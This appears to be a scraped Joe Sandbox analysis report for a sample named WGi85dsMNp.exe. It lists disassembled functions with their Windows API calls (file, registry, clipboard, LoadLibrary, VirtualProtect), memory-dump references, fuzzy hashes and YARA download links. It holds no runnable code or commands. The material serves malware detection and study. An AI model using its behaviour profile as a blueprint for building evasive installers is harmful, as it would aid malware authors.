Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D

Function 004067C2 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E

Function 00405EDE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\WGi85dsMNp.exe,80000000,00000003), ref: 00405EE2
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15

Function 0040599C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D

Function 6F942AAC Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 6F942B6B

Memory Dump Source

Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true

Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0970414ec9a9ca36f9954a75826dcee6b4028f566428a93ebaae6775f48dd15e
Instruction ID: ba70929aa8cc3ef2689696ce45a93e1c858103ef4c4fa10fe2e28d9f18aab3c5
Opcode Fuzzy Hash: 0970414ec9a9ca36f9954a75826dcee6b4028f566428a93ebaae6775f48dd15e
Instruction Fuzzy Hash: B84164B5804704DFEB34EFA8D9417593768FB36368F204856E908DA1C1D734E899CFA1

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E

Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E

Function 00406283 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634

Function 00405F61 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4

Function 00405F90 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00410444,0040CED0,004033DE,0040CED0,00410444,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8

Function 6F942993 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6F94505C,00000004,00000040,6F94504C), ref: 6F9429B1

Memory Dump Source

Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true

Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 131d92b9e20db265b3c46453d70425af78a94c244efbac9fe5cb1cdc865c6135
Instruction ID: e54cd6725c034cc5d81275ec14dc7766ccad7f6933310e0c89af6dbdd5c0bfaa
Opcode Fuzzy Hash: 131d92b9e20db265b3c46453d70425af78a94c244efbac9fe5cb1cdc865c6135
Instruction Fuzzy Hash: 5CF0A5F8508A84DEEB64EFAC84447193BE0B77B324B10452AE24CD6280E334846CCF91

Function 00406255 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14

Function 0040345D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00404394 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19

Non-executed Functions

Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004055ED
GetDlgItem.USER32(?,000003EE), ref: 004055FC
GetClientRect.USER32(?,?), ref: 00405639
GetSystemMetrics.USER32(00000002), ref: 00405640
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
ShowWindow.USER32(?,00000008), ref: 004056DC
GetDlgItem.USER32(?,000003EC), ref: 004056FD
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
GetDlgItem.USER32(?,000003F8), ref: 0040560B

Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2

GetDlgItem.USER32(?,000003EC), ref: 0040574F
CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
CloseHandle.KERNEL32(00000000), ref: 00405764
ShowWindow.USER32(00000000), ref: 00405788
ShowWindow.USER32(?,00000008), ref: 0040578D
ShowWindow.USER32(00000008), ref: 004057D7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
CreatePopupMenu.USER32 ref: 0040581C
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
GetWindowRect.USER32(?,?), ref: 00405850
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
OpenClipboard.USER32(00000000), ref: 004058B1
EmptyClipboard.USER32 ref: 004058B7
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
GlobalLock.KERNEL32(00000000), ref: 004058CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
GlobalUnlock.KERNEL32(00000000), ref: 00405901
SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
CloseClipboard.USER32 ref: 00405912

Strings

(7B, xrefs: 0040587D
{, xrefs: 004057F5

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68

Function 00404850 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040489F
SetWindowTextW.USER32(00000000,?), ref: 004048C9
SHBrowseForFolderW.SHELL32(?), ref: 0040497A
CoTaskMemFree.OLE32(00000000), ref: 00404985
lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
lstrcatW.KERNEL32(?,Call), ref: 004049C3
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5

Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45

Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3

Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

Call, xrefs: 004049B1, 004049B6, 004049C1
(7B, xrefs: 0040494D
A, xrefs: 00404973

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A$Call
API String ID: 2624150263-413618503
Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
